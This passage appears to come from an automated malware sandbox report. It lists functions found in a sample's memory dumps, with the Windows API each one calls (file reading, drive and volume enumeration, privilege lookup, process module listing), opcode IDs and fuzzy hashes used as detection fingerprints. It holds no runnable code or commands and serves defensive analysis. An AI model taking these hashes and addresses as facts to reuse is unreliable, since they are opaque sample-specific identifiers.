                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 08f6be570433c92f30b5a4c0bcca751425cfd4e028bf323cf4e21d0867c9db28
                                                    • Instruction ID: 2996a9b38874879488ba69a34873fcc6d47124fec3013e245d9ecc9ceccfa477
                                                    • Opcode Fuzzy Hash: 08f6be570433c92f30b5a4c0bcca751425cfd4e028bf323cf4e21d0867c9db28
                                                    • Instruction Fuzzy Hash: 3C219D6540D3C0AFD7138B258C54A62BFB4EF57620F0980CBDC888F2A3D2295808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 09cbb45ac244234db096518d6accf3b2a1efb54f4c268ac9a19858abc7533289
                                                    • Instruction ID: 73f495742a4f50d3a2f3202b1b1feb037deeecb4e36be26e20426dfe532c0f4d
                                                    • Opcode Fuzzy Hash: 09cbb45ac244234db096518d6accf3b2a1efb54f4c268ac9a19858abc7533289
                                                    • Instruction Fuzzy Hash: 0311B272500300EFEB21DF55DC85BA6FBA8EF44720F14886AED058A241D671A944CBB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 025DBA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a37033194d42e3eba9b214fe32bb26439c30cea03ddb5d22157acbc247997725
                                                    • Instruction ID: 8c76aa0d614b90efce00a914a0060f261dad2716a4eb92bc22d7baf7ab236ab3
                                                    • Opcode Fuzzy Hash: a37033194d42e3eba9b214fe32bb26439c30cea03ddb5d22157acbc247997725
                                                    • Instruction Fuzzy Hash: 3C119D72504384AFDB22CF65CC85B52FFF4FF05210F09849EEA898B662D375A418DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 028208E5
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: bd055c4d7ca215c267bb000c86a740608cdfc8567286b627a0dcf835ea349204
                                                    • Instruction ID: 162f349ed53437b3cf9f44fd0835bbe24685c05d63b8d89a297bbb5400939b9a
                                                    • Opcode Fuzzy Hash: bd055c4d7ca215c267bb000c86a740608cdfc8567286b627a0dcf835ea349204
                                                    • Instruction Fuzzy Hash: D311C176400304EFFB21CF51DC85FA6FBE8EF14721F14855AEE499A641C671A948CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 025DA39C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 6a5eedd3b230912cad3ec450cfcd17aba4f8a35854079e29c5c223bdbf8ddf61
                                                    • Instruction ID: 94c73ad4acc41eecd1ea39803feab5b326a55f11dbbb346fc514592baab1bcc9
                                                    • Opcode Fuzzy Hash: 6a5eedd3b230912cad3ec450cfcd17aba4f8a35854079e29c5c223bdbf8ddf61
                                                    • Instruction Fuzzy Hash: 30118F714093C49FE7228B15DC54BA2BFB4EF47614F0880CAEDC48F253D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028212D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 9a77f4261cc575fec0d10c2f0795a6b05a1d670968980ee39d0ce7874c6366b2
                                                    • Instruction ID: f3f284c66dd2466e913e6f1c0da50c71e1278796f03beabee6be05348bcdf546
                                                    • Opcode Fuzzy Hash: 9a77f4261cc575fec0d10c2f0795a6b05a1d670968980ee39d0ce7874c6366b2
                                                    • Instruction Fuzzy Hash: EE1191755093849FDB118F25DC89B96FFE4EF06220F0984EEED498B252D279A848CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028205E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 896d64f8c4a67eca82603445abe6da0d568ec0fb0a96c3ec24f95af557addb7d
                                                    • Instruction ID: 25747432b5b1e40603189de47c96dc1d113ef3ce573921b267eb927914ee718c
                                                    • Opcode Fuzzy Hash: 896d64f8c4a67eca82603445abe6da0d568ec0fb0a96c3ec24f95af557addb7d
                                                    • Instruction Fuzzy Hash: 1D11E0765093C09FDB128B15DC85B52BFB4DF12220F0880DBED898B263D265A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 025DAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 9972592a43bb2a1fd38131a0dae3709f21bf70dccc965e731c5dd34245703c27
                                                    • Instruction ID: 06d4f50be1f363710b1feeaeb37bb11b719d30ad189bd75840431941d4a2065a
                                                    • Opcode Fuzzy Hash: 9972592a43bb2a1fd38131a0dae3709f21bf70dccc965e731c5dd34245703c27
                                                    • Instruction Fuzzy Hash: 7F115EB26003419FEB20DF29DC85B57FBE8EB05621F08C46AED09CB641D775E844CA65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 025DAA71
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 20be30102f860cb216bdb15ac8e2b25d7d93fd13289ccc41f2afc18de9913313
                                                    • Instruction ID: 7dae284ea93ff222f6d2e2c5bc8f3c132d13a9f7a9ac330a1225e78f6d2393ea
                                                    • Opcode Fuzzy Hash: 20be30102f860cb216bdb15ac8e2b25d7d93fd13289ccc41f2afc18de9913313
                                                    • Instruction Fuzzy Hash: D911A37540D7C49FD7128B15DC85B92BFB4EF03224F0980DBDD858F163D269A909D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0282092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: b286e47bdaa7f9b931cabdc4d39de540a829576ae2f91643db71ddf71ae59995
                                                    • Instruction ID: 19030c2878cdeafcf64229ae765920f5b49af8085c5b4440d81dd8a086866068
                                                    • Opcode Fuzzy Hash: b286e47bdaa7f9b931cabdc4d39de540a829576ae2f91643db71ddf71ae59995
                                                    • Instruction Fuzzy Hash: 22119D754093C49FE712CB25DC55B92BFB4EF17324F09C0DADD898B263C265A948CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028207C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 02820819
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 985b745678a4ea971cb883d2c4b44a5923947f4cc23602758efad53cc12d215b
                                                    • Instruction ID: e64f9e3220e757bc9cc449b10fd4302efce926968bf12dcd5e943a61c3815d73
                                                    • Opcode Fuzzy Hash: 985b745678a4ea971cb883d2c4b44a5923947f4cc23602758efad53cc12d215b
                                                    • Instruction Fuzzy Hash: 64018079500744EFFB209F15DC85BA7FBA8DF44721F14C096EE099A241D674A948CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028213AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 38e9e17edbeda5ce3074026c34a8ccbdeef50e3c636041afae67207dd000340d
                                                    • Instruction ID: 5d723ce42b0528aea85bf21fa15f546438195ee9a11721ad3382d71c28df0ddd
                                                    • Opcode Fuzzy Hash: 38e9e17edbeda5ce3074026c34a8ccbdeef50e3c636041afae67207dd000340d
                                                    • Instruction Fuzzy Hash: 9A11AC7A500704DFEB20CF15D889B66FBE4EF04220F18C4AADD0DCA612D231E448CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 025DABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 2693d0ebd32f2a54b3ca4795ba38abd3e12fb6ed35d8a418b0479c43a4dfa970
                                                    • Instruction ID: ad99744169daf99dedfec44ab9776dc6920eacab7a2c310243aa522b70a74087
                                                    • Opcode Fuzzy Hash: 2693d0ebd32f2a54b3ca4795ba38abd3e12fb6ed35d8a418b0479c43a4dfa970
                                                    • Instruction Fuzzy Hash: BC11C2B54093809FDB11CF15DC85B82BFA4EF02220F0980ABDD488F153D275A548CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 025DBA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 50bd2515438ca4bfc7f6c7a01ce519fc795f507c5695805dcb9bc7c4536a50e1
                                                    • Instruction ID: 62e29f7351b470fc38434ec3d0b28a29dfb10233ef0290a04b544682c4c10c12
                                                    • Opcode Fuzzy Hash: 50bd2515438ca4bfc7f6c7a01ce519fc795f507c5695805dcb9bc7c4536a50e1
                                                    • Instruction Fuzzy Hash: AF117C72500704DFDB30CF59D885B52FFE5FF04215F0888AADE498A612D371E418DB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 025DA23E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 150429e614ac3c833f56f5c602150a712dcd71722abcb89d702fc20714853c8f
                                                    • Instruction ID: bc8b18453fba56252dc2e83b2bad64149300d966467bf304647224c680f1edd3
                                                    • Opcode Fuzzy Hash: 150429e614ac3c833f56f5c602150a712dcd71722abcb89d702fc20714853c8f
                                                    • Instruction Fuzzy Hash: 39018471900600AFE310DF16DC86B66FBF8FB84A20F14816AED089B741D275F955CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: b2bd56dcc8ab389c1a7575e01fd88416a34d7fe2e63cc9b11c529003b6ccfdc8
                                                    • Instruction ID: 9876082b575b7667aae633a2ff76c50fe630afdc717d609e1953d95a8734e4c6
                                                    • Opcode Fuzzy Hash: b2bd56dcc8ab389c1a7575e01fd88416a34d7fe2e63cc9b11c529003b6ccfdc8
                                                    • Instruction Fuzzy Hash: 1A019E796003548FEB10DF29DC857A6FBE8EB10224F0884ABDD09CB642D774E448CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0282104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 1b58e43a227bd03b21c987e6c54dbe2b99a60ed51f70159faf34be57967c47a9
                                                    • Instruction ID: c3697b3d18abbfc16777101eecb29ceb6438b122756f55a0f6f275f3181b7bf3
                                                    • Opcode Fuzzy Hash: 1b58e43a227bd03b21c987e6c54dbe2b99a60ed51f70159faf34be57967c47a9
                                                    • Instruction Fuzzy Hash: 93017171900600AFE310DF16DC86B66FBF8FB84A20F14816AED089B741D275B955CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 9ee025d7f91a07399078790b56d114e2add93f09cae3828642f9e28d309ab29f
                                                    • Instruction ID: 580f24614d5720c0c67a0962c8be098d38cafeadd45e08bc8dcd47261b09f57c
                                                    • Opcode Fuzzy Hash: 9ee025d7f91a07399078790b56d114e2add93f09cae3828642f9e28d309ab29f
                                                    • Instruction Fuzzy Hash: DD01DF71900240DFEB20CF19DC857A5FFE4EF04624F08C4AADD498B256D675E808CB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028212FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0282132F
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: f11ed5a3dd5b6a26ec562c38acb65c45ea2161c36ae41fac943b7e7b02c55c8f
                                                    • Instruction ID: c1343ae95580b788e8ff0eb80a0d1c0af50f3dff5bdf8a368b5f9b5dc1360a49
                                                    • Opcode Fuzzy Hash: f11ed5a3dd5b6a26ec562c38acb65c45ea2161c36ae41fac943b7e7b02c55c8f
                                                    • Instruction Fuzzy Hash: 9A01BC79500344DFEF208F15D9897A5FBE4EF04620F18C4AADD09CB642D679A848CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 025DA94A
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: a7fa1e39063e2b6b279d4112d5553936a25e2b5782f81df1c928fbade8b4e822
                                                    • Instruction ID: 665ee85f5bb28ff1fe682ed14cc024348a45af2ab5e037f59b65c0e26c0c7e79
                                                    • Opcode Fuzzy Hash: a7fa1e39063e2b6b279d4112d5553936a25e2b5782f81df1c928fbade8b4e822
                                                    • Instruction Fuzzy Hash: 5E016D72900601ABE310DF16DC86B26FBF8FB88B20F14825AED085B741D275F955CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028204B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02820502
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 2bcf3aa9f3245a5935cca4b77ebd4e3db8f662a35f5f7e88f2732b3e4151fd5a
                                                    • Instruction ID: f0488caa8485c2e86883bc47554f5de93ea42abbe0018ed99d4b0ae22e150d40
                                                    • Opcode Fuzzy Hash: 2bcf3aa9f3245a5935cca4b77ebd4e3db8f662a35f5f7e88f2732b3e4151fd5a
                                                    • Instruction Fuzzy Hash: 71016D72900601ABE310DF16DC86B26FBF8FB88B20F14825AED085B741D275F955CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02820F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02820FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 9c4cd155c10bcc73ee6b16f58f29ae2302614ebe5c0f4e801d0357bf7b7e1997
                                                    • Instruction ID: f0e26a946309cc3da41d31f2500437e144773ba9905d462c9e6ade72c1d2fd82
                                                    • Opcode Fuzzy Hash: 9c4cd155c10bcc73ee6b16f58f29ae2302614ebe5c0f4e801d0357bf7b7e1997
                                                    • Instruction Fuzzy Hash: 44017C79504344DFEB10DF15D885B66FBE4EB10624F4884AADD48CF686D375E488CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0282060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02820640
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 59b4dd618e8f8ccbdbda0b28ea71e4cf0f502d53c078d46516a46c59f9880636
                                                    • Instruction ID: 51d7a1beca72e3df21e552ca1c3e64e23ed2b40f61f444e6f30c7178fb86c6b3
                                                    • Opcode Fuzzy Hash: 59b4dd618e8f8ccbdbda0b28ea71e4cf0f502d53c078d46516a46c59f9880636
                                                    • Instruction Fuzzy Hash: B001FF79600754DFEB208F15D885761FBA0EF51724F08C0AADD0A8B752D775E888DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 025DABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 80a2e86d710f6625394bdf4416afd443bb293d5c4af3ecf55a8aa2e42668ae51
                                                    • Instruction ID: c21d060bde84379964c3ad0d24b6efdd160f02242c8bb1ea172afa67169c5d49
                                                    • Opcode Fuzzy Hash: 80a2e86d710f6625394bdf4416afd443bb293d5c4af3ecf55a8aa2e42668ae51
                                                    • Instruction Fuzzy Hash: F7018171504744DFEB20DF59DC85792FFA4EF00621F48C4AADD098F242D675A544CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02821116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02821148
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: b92255db26ce6a4cce57abd92a35e9f0d33906d0ba6380e158e735d095286929
                                                    • Instruction ID: 5ec04b8b20182fce090fa2e3806f0d0a29ae8fb71806455aa9ceaca5963ec737
                                                    • Opcode Fuzzy Hash: b92255db26ce6a4cce57abd92a35e9f0d33906d0ba6380e158e735d095286929
                                                    • Instruction Fuzzy Hash: FEF0FF39500754DFEB20CF05D889761FBA0EF00A21F18C09ACD0C8B312C675A888CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 025DA39C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 9949440d034d5ceab7bd0a17125d3f95b3fbe227ebeae2a2e02d5b6e6d473c84
                                                    • Instruction ID: c82c5d9fbc8702876545c274b5948cef78874b9b9eaa25297ceac659ef914e33
                                                    • Opcode Fuzzy Hash: 9949440d034d5ceab7bd0a17125d3f95b3fbe227ebeae2a2e02d5b6e6d473c84
                                                    • Instruction Fuzzy Hash: 01F0CD35514744DFEB20DF0AD889766FFA1EF04721F08C09ADD094B312D375E848CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0282096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0282099C
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 1ac4613e135287b12fc6478d4ca6e2789ac2ed0d9baaced484c68947ca90d5b6
                                                    • Instruction ID: c61a2fd830da6634cabd7109acf9f8c44e9b3950d824b3d4a75a344840bdc234
                                                    • Opcode Fuzzy Hash: 1ac4613e135287b12fc6478d4ca6e2789ac2ed0d9baaced484c68947ca90d5b6
                                                    • Instruction Fuzzy Hash: 86F0C239504744DFEB20DF05D885765FBA0EF24726F08C09ADD4A9B316D375A888CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 025DAA71
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: dcb6e577bab0071dbdc1777cdaeedfeb274015e8fad2224af163af51201f1363
                                                    • Instruction ID: a625b675b5e2e1ec16819460cc6be47382d29131bfa002476e4a59620616dd21
                                                    • Opcode Fuzzy Hash: dcb6e577bab0071dbdc1777cdaeedfeb274015e8fad2224af163af51201f1363
                                                    • Instruction Fuzzy Hash: D0F0CD31500B84CFEB20CF19D989762FFA0EF04621F48C19ADD094B242D279A948CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 025DA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 05de9c9682ad5ff1df70ba69f075129a083d81dcb06e6d36aa56c835e47623d9
                                                    • Instruction ID: e1922021d5f9a367dd0e979d3c32c62b253547bfcee89759e176970c2b5117ff
                                                    • Opcode Fuzzy Hash: 05de9c9682ad5ff1df70ba69f075129a083d81dcb06e6d36aa56c835e47623d9
                                                    • Instruction Fuzzy Hash: 4B1191715093849FD711CB25DC85B92BFA4EF02220F0980ABED458B252D275A848CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 025DA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 025DA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 0bfd34d7876d1ab26fc126ae607823c3b16452b09c325b3c35bf6cdee7efd7b5
                                                    • Instruction ID: 13dc5a8e7601764bc6dcbea4a0d09362c4fbe51cab0cfb58e9379722dbddfa73
                                                    • Opcode Fuzzy Hash: 0bfd34d7876d1ab26fc126ae607823c3b16452b09c325b3c35bf6cdee7efd7b5
                                                    • Instruction Fuzzy Hash: 6401AD75600780DFEB20DF19DC897A6FFE4EF04220F08C4ABDD098B646D675A948CB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027E07F7, Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182805896.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
